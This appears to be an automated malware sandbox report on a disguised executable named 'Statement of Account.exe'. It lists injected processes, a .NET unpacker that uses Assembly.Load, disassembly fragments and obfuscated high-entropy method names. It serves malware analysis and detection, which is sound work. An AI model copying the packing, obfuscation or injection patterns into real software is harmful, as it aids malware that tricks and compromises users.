          Source: Binary string: ipconfig.pdbGCTL source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.cs.Net Code: h2ApMUZCVK System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.cs.Net Code: h2ApMUZCVK System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.cs.Net Code: h2ApMUZCVK System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement of Account.exe.302a868.1.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement of Account.exe.303bac4.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement of Account.exe.8f20000.4.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 8.2.SIZfuXT.exe.32ea7f8.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041794F push ss; ret 6_2_0041797F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00417993 push ss; ret 6_2_0041797F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00416B24 push ss; retf 6_2_00416B27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041D475 push eax; ret 6_2_0041D4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041D4C2 push eax; ret 6_2_0041D4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041D4CB push eax; ret 6_2_0041D532
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041ED53 push dword ptr [914FBFDDh]; ret 6_2_0041ED74
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041D52C push eax; ret 6_2_0041D532
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041E77C push 2E339416h; ret 6_2_0041E842
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041779C push esp; retf 6_2_0041779D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C127FA pushad ; ret 6_2_05C127F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C1225F pushad ; ret 6_2_05C127F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C409AD push ecx; mov dword ptr [esp], ecx6_2_05C409B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C1283D push eax; iretd 6_2_05C12858
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C11368 push eax; iretd 6_2_05C11369
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C119A8 push ds; retn 0005h6_2_05C119B6
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A4B1E push esp; retn 0000h7_2_0E5A4B1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A4B02 push esp; retn 0000h7_2_0E5A4B03
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A49B5 push esp; retn 0000h7_2_0E5A4AE7
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66DB02 push esp; retn 0000h7_2_0E66DB03
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66DB1E push esp; retn 0000h7_2_0E66DB1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66D9B5 push esp; retn 0000h7_2_0E66DAE7
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F3B1E push esp; retn 0000h7_2_0E7F3B1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F3B02 push esp; retn 0000h7_2_0E7F3B03
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F39B5 push esp; retn 0000h7_2_0E7F3AE7
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6EDB02 push esp; retn 0000h7_2_0F6EDB03
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6EDB1E push esp; retn 0000h7_2_0F6EDB1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6ED9B5 push esp; retn 0000h7_2_0F6EDAE7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561C06D push edi; ret 12_2_0561C06F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05620E7F push edi; ret 12_2_05620E81
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D09AD push ecx; mov dword ptr [esp], ecx12_2_055D09B6
          Source: Statement of Account.exeStatic PE information: section name: .text entropy: 7.785000969686177
          Source: SIZfuXT.exe.0.drStatic PE information: section name: .text entropy: 7.785000969686177
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, BFaMK2EQJcYgGTNiOi.csHigh entropy of concatenated method names: 'CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi', 'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, wDus2skaqqyhDZoA7u.csHigh entropy of concatenated method names: 'a8fRVfHeSY', 'AltRDCf4Uf', 'pyPRikltki', 'Ma0R9BxRrZ', 'NYIRTNuspT', 'Fy6RwPXmoY', 'X2MRNrSdEN', 'xLlRoBThUP', 'pQuRgLCYsD', 'YJ4RHYaIDJ'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, GH5cpf2ynEV7MPEjrp.csHigh entropy of concatenated method names: 'yj7RvEYKY6', 'BX3R1RSpv4', 'O4gRudIKHs', 'KjjRKMaB3R', 'x1GREWecDZ', 'NnMRLn1Ub1', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, piVZYUd937jqjJGPQH.csHigh entropy of concatenated method names: 'iWDwra04AG', 'nAdwUd2npM', 'C80wM4BVTw', 'zbbweU9hpO', 'RW3wqoqQpk', 'dQfwOHwTFg', 'slWwQMJOWd', 'oTDwBs5chC', 'Fkww7x05yS', 'eJ6wZh6STE'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, tXNOnQxWMqJZBBg8UI.csHigh entropy of concatenated method names: 'K834gc2YYa', 'Qv84H9aNBK', 'ToString', 'Bau4V3pTh4', 'rbP4DmO6uq', 'au34ihVFdJ', 'oao496VeMs', 'zoc4TwwB0l', 'X754wfUXyC', 'O5Y4NKJV6C'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, xmtO82pjoVLVJNORKv.csHigh entropy of concatenated method names: 'nmpFwHcwPa', 'urBFNVw3QX', 'slWFgEXHHZ', 'pwbFHPjxtZ', 'BfqFaDDKbR', 'peJFI16WNG', 'kHv3GJ5aZEr95CeXr6', 'C71Wm9aPx8Q1x83QsQ', 'c13FFuArcC', 'n1kFnJeq9Y'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, iHA8dW7lWEXHHZIwbP.csHigh entropy of concatenated method names: 'KpxiekfaMd', 'Ei8iOC0JrM', 'EpAiB8kvEM', 'cEri7v6wXH', 'QDgiasticw', 'MZkiISxQBZ', 'DL9i4B2XR0', 'GLfiRbM2Nv', 'd49iW5nVi1', 'mGkiPjZr8Y'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, wNO6UNA7PZZq5xgB2l.csHigh entropy of concatenated method names: 'p6u4kM5lWt', 'UH34miGprc', 'xymRCmr7mW', 'OD8RF2XXSw', 'Ujg40I2Peu', 'oG34JaOxjj', 'pvS4hHNB3A', 'fhP4EUkI8u', 'qyM4jdTZnY', 'bKc4XPq0O2'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, nVZ6GfDd2Njl6pJbHq.csHigh entropy of concatenated method names: 'Dispose', 'XbWF2PdgnY', 'LsbS1KVcuj', 'z0wccWt4sy', 'ecDFmus2sa', 'BqyFzhDZoA', 'ProcessDialogKey', 'EuvSCH5cpf', 'NnESFV7MPE', 'SrpSSpL4Wl'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, o0c0J3SSaFSfA4cU4U.csHigh entropy of concatenated method names: 'iJhM3ZQjZ', 'nXWeouXbH', 'IReOUcTkt', 'mOGQoZC5d', 'MXc788IVg', 'vesZk8yag', 'FycFTqj7BIPwc0B2Hb', 'XDPc3jnVr8HUgMmIse', 'R4hRgON9W', 'uRMPs2i9d'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, aNt0kvhOA4r79J034O.csHigh entropy of concatenated method names: 'LxaYBt4oAK', 'jA1Y7LhWpE', 'a41Yva4vVV', 'Dy4Y12GcOn', 'sndYKKf9me', 'epfYLGDtuS', 'muKY8fMmVw', 'TBXY3Cwct5', 'pCCYyi2VDi', 'VSTY0Mp92X'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, IbRaeJv16WNGGiFFKM.csHigh entropy of concatenated method names: 'QXxTfDnEge', 'eo4TDPuChL', 'KLjT9Gm1ls', 'NonTwT9sxP', 'XkZTN1hDQb', 'JoR96SHodZ', 'pnK9Avo5e5', 'CAT9l3jyls', 'm1f9koUbfG', 'jU392xxbMm'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dVqm1OFnHbnbVGkLyVO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RrFPE39kgE', 'HbePj4cCyy', 'DLWPXEVJdI', 'XZLPxg5WNi', 'lZqP6MngMg', 'cgmPADyicl', 'fF5PlpHXnc'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dL4WlUmMRQ2b1fG4m4.csHigh entropy of concatenated method names: 'MDgWFQD7O3', 'VcaWnmpnhw', 'U7EWpiyGdS', 'MHhWVcumkD', 'VQpWDkGn5l', 'Q3JW9560Ob', 'CMlWTM96Y7', 'fwGRluKMlm', 'bgVRkgxFkT', 'FjtR2VV90Q'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dHcwPaBtrBVw3QXCBV.csHigh entropy of concatenated method names: 'wwbDETCkwV', 'wdfDjM6tI2', 'LPuDXaShZd', 'PdfDxov5mO', 'C7yD6NCVRs', 'qXyDAboLjZ', 'P88DlMkPCF', 'cDfDk5bYBV', 'UcwD2cNCmf', 'hhJDmohOYy'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.csHigh entropy of concatenated method names: 'N5AnfGnof0', 'moxnVfrmm1', 'xk6nDDJ6tb', 'oMTni8GYbb', 'xFin91jVTq', 'TQ0nTShJSx', 'RXcnwDxRuU', 'Pi8nN54pCw', 'fnHnojHh51', 'QZcngjsdwf'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, NBT97XX2SDM6oGlSbG.csHigh entropy of concatenated method names: 'ToString', 'oNqI0R5w5m', 'XJoI1MfUht', 'RMQIuj56yp', 'Ow8IKTHMmM', 'kAWILdfs4k', 'rMGIGrYoSn', 'WABI8ss1cD', 'WqRI31Qoqv', 'qpHIdxA6Y7'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, RxtZ7GZAg7MmvOfqDD.csHigh entropy of concatenated method names: 'N9g9qQAuGQ', 'wTb9Qluaat', 'HUniugHtit', 'eyfiK5w3K3', 'xh1iLatC5C', 'x76iGg787Q', 'iTxi8bsJZq', 'AlQi3ZAIbQ', 'MGYidlfIGY', 'p75iy2J57r'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, OCG6vC8lrRS2FsMFyk.csHigh entropy of concatenated method names: 'aiwwVXBjwF', 'HRBwi25cLi', 'P65wT6eZdT', 'Op5TmEPFH9', 'KqBTzNBXnx', 'ql8wCx53FR', 'xF9wFcuKW2', 'AkFwS2SahI', 'VkSwnVIUPb', 'M2dwpnscM3'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, b7Ph0RzMVq5MZym5UK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zBVWYfMOU5', 'zkgWaV2f58', 'OQkWIQ0rcw', 'FuwW4bCSMK', 'Fk3WRGfNfp', 'kAKWWRqTkG', 'FGnWPaIr5y'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, c4WUnNFC4vMmlKQoIHO.csHigh entropy of concatenated method names: 'LspWrWyYMc', 'AdSWUfmPPj', 'k9PWMZDfLp', 'q9lWe79M4u', 'OFkWq2UJJO', 'sb5WOjGTm7', 'kOuWQTdCmG', 'dpYWBahl4J', 'htNW7Ji9uZ', 'RtQWZrKgZT'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, BFaMK2EQJcYgGTNiOi.csHigh entropy of concatenated method names: 'CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi', 'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, wDus2skaqqyhDZoA7u.csHigh entropy of concatenated method names: 'a8fRVfHeSY', 'AltRDCf4Uf', 'pyPRikltki', 'Ma0R9BxRrZ', 'NYIRTNuspT', 'Fy6RwPXmoY', 'X2MRNrSdEN', 'xLlRoBThUP', 'pQuRgLCYsD', 'YJ4RHYaIDJ'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, GH5cpf2ynEV7MPEjrp.csHigh entropy of concatenated method names: 'yj7RvEYKY6', 'BX3R1RSpv4', 'O4gRudIKHs', 'KjjRKMaB3R', 'x1GREWecDZ', 'NnMRLn1Ub1', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, piVZYUd937jqjJGPQH.csHigh entropy of concatenated method names: 'iWDwra04AG', 'nAdwUd2npM', 'C80wM4BVTw', 'zbbweU9hpO', 'RW3wqoqQpk', 'dQfwOHwTFg', 'slWwQMJOWd', 'oTDwBs5chC', 'Fkww7x05yS', 'eJ6wZh6STE'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, tXNOnQxWMqJZBBg8UI.csHigh entropy of concatenated method names: 'K834gc2YYa', 'Qv84H9aNBK', 'ToString', 'Bau4V3pTh4', 'rbP4DmO6uq', 'au34ihVFdJ', 'oao496VeMs', 'zoc4TwwB0l', 'X754wfUXyC', 'O5Y4NKJV6C'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, xmtO82pjoVLVJNORKv.csHigh entropy of concatenated method names: 'nmpFwHcwPa', 'urBFNVw3QX', 'slWFgEXHHZ', 'pwbFHPjxtZ', 'BfqFaDDKbR', 'peJFI16WNG', 'kHv3GJ5aZEr95CeXr6', 'C71Wm9aPx8Q1x83QsQ', 'c13FFuArcC', 'n1kFnJeq9Y'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, iHA8dW7lWEXHHZIwbP.csHigh entropy of concatenated method names: 'KpxiekfaMd', 'Ei8iOC0JrM', 'EpAiB8kvEM', 'cEri7v6wXH', 'QDgiasticw', 'MZkiISxQBZ', 'DL9i4B2XR0', 'GLfiRbM2Nv', 'd49iW5nVi1', 'mGkiPjZr8Y'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, wNO6UNA7PZZq5xgB2l.csHigh entropy of concatenated method names: 'p6u4kM5lWt', 'UH34miGprc', 'xymRCmr7mW', 'OD8RF2XXSw', 'Ujg40I2Peu', 'oG34JaOxjj', 'pvS4hHNB3A', 'fhP4EUkI8u', 'qyM4jdTZnY', 'bKc4XPq0O2'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, nVZ6GfDd2Njl6pJbHq.csHigh entropy of concatenated method names: 'Dispose', 'XbWF2PdgnY', 'LsbS1KVcuj', 'z0wccWt4sy', 'ecDFmus2sa', 'BqyFzhDZoA', 'ProcessDialogKey', 'EuvSCH5cpf', 'NnESFV7MPE', 'SrpSSpL4Wl'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, o0c0J3SSaFSfA4cU4U.csHigh entropy of concatenated method names: 'iJhM3ZQjZ', 'nXWeouXbH', 'IReOUcTkt', 'mOGQoZC5d', 'MXc788IVg', 'vesZk8yag', 'FycFTqj7BIPwc0B2Hb', 'XDPc3jnVr8HUgMmIse', 'R4hRgON9W', 'uRMPs2i9d'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, aNt0kvhOA4r79J034O.csHigh entropy of concatenated method names: 'LxaYBt4oAK', 'jA1Y7LhWpE', 'a41Yva4vVV', 'Dy4Y12GcOn', 'sndYKKf9me', 'epfYLGDtuS', 'muKY8fMmVw', 'TBXY3Cwct5', 'pCCYyi2VDi', 'VSTY0Mp92X'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, IbRaeJv16WNGGiFFKM.csHigh entropy of concatenated method names: 'QXxTfDnEge', 'eo4TDPuChL', 'KLjT9Gm1ls', 'NonTwT9sxP', 'XkZTN1hDQb', 'JoR96SHodZ', 'pnK9Avo5e5', 'CAT9l3jyls', 'm1f9koUbfG', 'jU392xxbMm'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dVqm1OFnHbnbVGkLyVO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RrFPE39kgE', 'HbePj4cCyy', 'DLWPXEVJdI', 'XZLPxg5WNi', 'lZqP6MngMg', 'cgmPADyicl', 'fF5PlpHXnc'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dL4WlUmMRQ2b1fG4m4.csHigh entropy of concatenated method names: 'MDgWFQD7O3', 'VcaWnmpnhw', 'U7EWpiyGdS', 'MHhWVcumkD', 'VQpWDkGn5l', 'Q3JW9560Ob', 'CMlWTM96Y7', 'fwGRluKMlm', 'bgVRkgxFkT', 'FjtR2VV90Q'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dHcwPaBtrBVw3QXCBV.csHigh entropy of concatenated method names: 'wwbDETCkwV', 'wdfDjM6tI2', 'LPuDXaShZd', 'PdfDxov5mO', 'C7yD6NCVRs', 'qXyDAboLjZ', 'P88DlMkPCF', 'cDfDk5bYBV', 'UcwD2cNCmf', 'hhJDmohOYy'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.csHigh entropy of concatenated method names: 'N5AnfGnof0', 'moxnVfrmm1', 'xk6nDDJ6tb', 'oMTni8GYbb', 'xFin91jVTq', 'TQ0nTShJSx', 'RXcnwDxRuU', 'Pi8nN54pCw', 'fnHnojHh51', 'QZcngjsdwf'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, NBT97XX2SDM6oGlSbG.csHigh entropy of concatenated method names: 'ToString', 'oNqI0R5w5m', 'XJoI1MfUht', 'RMQIuj56yp', 'Ow8IKTHMmM', 'kAWILdfs4k', 'rMGIGrYoSn', 'WABI8ss1cD', 'WqRI31Qoqv', 'qpHIdxA6Y7'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, RxtZ7GZAg7MmvOfqDD.csHigh entropy of concatenated method names: 'N9g9qQAuGQ', 'wTb9Qluaat', 'HUniugHtit', 'eyfiK5w3K3', 'xh1iLatC5C', 'x76iGg787Q', 'iTxi8bsJZq', 'AlQi3ZAIbQ', 'MGYidlfIGY', 'p75iy2J57r'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, OCG6vC8lrRS2FsMFyk.csHigh entropy of concatenated method names: 'aiwwVXBjwF', 'HRBwi25cLi', 'P65wT6eZdT', 'Op5TmEPFH9', 'KqBTzNBXnx', 'ql8wCx53FR', 'xF9wFcuKW2', 'AkFwS2SahI', 'VkSwnVIUPb', 'M2dwpnscM3'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, b7Ph0RzMVq5MZym5UK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zBVWYfMOU5', 'zkgWaV2f58', 'OQkWIQ0rcw', 'FuwW4bCSMK', 'Fk3WRGfNfp', 'kAKWWRqTkG', 'FGnWPaIr5y'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, c4WUnNFC4vMmlKQoIHO.csHigh entropy of concatenated method names: 'LspWrWyYMc', 'AdSWUfmPPj', 'k9PWMZDfLp', 'q9lWe79M4u', 'OFkWq2UJJO', 'sb5WOjGTm7', 'kOuWQTdCmG', 'dpYWBahl4J', 'htNW7Ji9uZ', 'RtQWZrKgZT'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, BFaMK2EQJcYgGTNiOi.csHigh entropy of concatenated method names: 'CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi', 'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, wDus2skaqqyhDZoA7u.csHigh entropy of concatenated method names: 'a8fRVfHeSY', 'AltRDCf4Uf', 'pyPRikltki', 'Ma0R9BxRrZ', 'NYIRTNuspT', 'Fy6RwPXmoY', 'X2MRNrSdEN', 'xLlRoBThUP', 'pQuRgLCYsD', 'YJ4RHYaIDJ'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, GH5cpf2ynEV7MPEjrp.csHigh entropy of concatenated method names: 'yj7RvEYKY6', 'BX3R1RSpv4', 'O4gRudIKHs', 'KjjRKMaB3R', 'x1GREWecDZ', 'NnMRLn1Ub1', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, piVZYUd937jqjJGPQH.csHigh entropy of concatenated method names: 'iWDwra04AG', 'nAdwUd2npM', 'C80wM4BVTw', 'zbbweU9hpO', 'RW3wqoqQpk', 'dQfwOHwTFg', 'slWwQMJOWd', 'oTDwBs5chC', 'Fkww7x05yS', 'eJ6wZh6STE'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, tXNOnQxWMqJZBBg8UI.csHigh entropy of concatenated method names: 'K834gc2YYa', 'Qv84H9aNBK', 'ToString', 'Bau4V3pTh4', 'rbP4DmO6uq', 'au34ihVFdJ', 'oao496VeMs', 'zoc4TwwB0l', 'X754wfUXyC', 'O5Y4NKJV6C'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, xmtO82pjoVLVJNORKv.csHigh entropy of concatenated method names: 'nmpFwHcwPa', 'urBFNVw3QX', 'slWFgEXHHZ', 'pwbFHPjxtZ', 'BfqFaDDKbR', 'peJFI16WNG', 'kHv3GJ5aZEr95CeXr6', 'C71Wm9aPx8Q1x83QsQ', 'c13FFuArcC', 'n1kFnJeq9Y'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, iHA8dW7lWEXHHZIwbP.csHigh entropy of concatenated method names: 'KpxiekfaMd', 'Ei8iOC0JrM', 'EpAiB8kvEM', 'cEri7v6wXH', 'QDgiasticw', 'MZkiISxQBZ', 'DL9i4B2XR0', 'GLfiRbM2Nv', 'd49iW5nVi1', 'mGkiPjZr8Y'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, wNO6UNA7PZZq5xgB2l.csHigh entropy of concatenated method names: 'p6u4kM5lWt', 'UH34miGprc', 'xymRCmr7mW', 'OD8RF2XXSw', 'Ujg40I2Peu', 'oG34JaOxjj', 'pvS4hHNB3A', 'fhP4EUkI8u', 'qyM4jdTZnY', 'bKc4XPq0O2'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, nVZ6GfDd2Njl6pJbHq.csHigh entropy of concatenated method names: 'Dispose', 'XbWF2PdgnY', 'LsbS1KVcuj', 'z0wccWt4sy', 'ecDFmus2sa', 'BqyFzhDZoA', 'ProcessDialogKey', 'EuvSCH5cpf', 'NnESFV7MPE', 'SrpSSpL4Wl'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, o0c0J3SSaFSfA4cU4U.csHigh entropy of concatenated method names: 'iJhM3ZQjZ', 'nXWeouXbH', 'IReOUcTkt', 'mOGQoZC5d', 'MXc788IVg', 'vesZk8yag', 'FycFTqj7BIPwc0B2Hb', 'XDPc3jnVr8HUgMmIse', 'R4hRgON9W', 'uRMPs2i9d'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, aNt0kvhOA4r79J034O.csHigh entropy of concatenated method names: 'LxaYBt4oAK', 'jA1Y7LhWpE', 'a41Yva4vVV', 'Dy4Y12GcOn', 'sndYKKf9me', 'epfYLGDtuS', 'muKY8fMmVw', 'TBXY3Cwct5', 'pCCYyi2VDi', 'VSTY0Mp92X'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, IbRaeJv16WNGGiFFKM.csHigh entropy of concatenated method names: 'QXxTfDnEge', 'eo4TDPuChL', 'KLjT9Gm1ls', 'NonTwT9sxP', 'XkZTN1hDQb', 'JoR96SHodZ', 'pnK9Avo5e5', 'CAT9l3jyls', 'm1f9koUbfG', 'jU392xxbMm'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dVqm1OFnHbnbVGkLyVO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RrFPE39kgE', 'HbePj4cCyy', 'DLWPXEVJdI', 'XZLPxg5WNi', 'lZqP6MngMg', 'cgmPADyicl', 'fF5PlpHXnc'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dL4WlUmMRQ2b1fG4m4.csHigh entropy of concatenated method names: 'MDgWFQD7O3', 'VcaWnmpnhw', 'U7EWpiyGdS', 'MHhWVcumkD', 'VQpWDkGn5l', 'Q3JW9560Ob', 'CMlWTM96Y7', 'fwGRluKMlm', 'bgVRkgxFkT', 'FjtR2VV90Q'
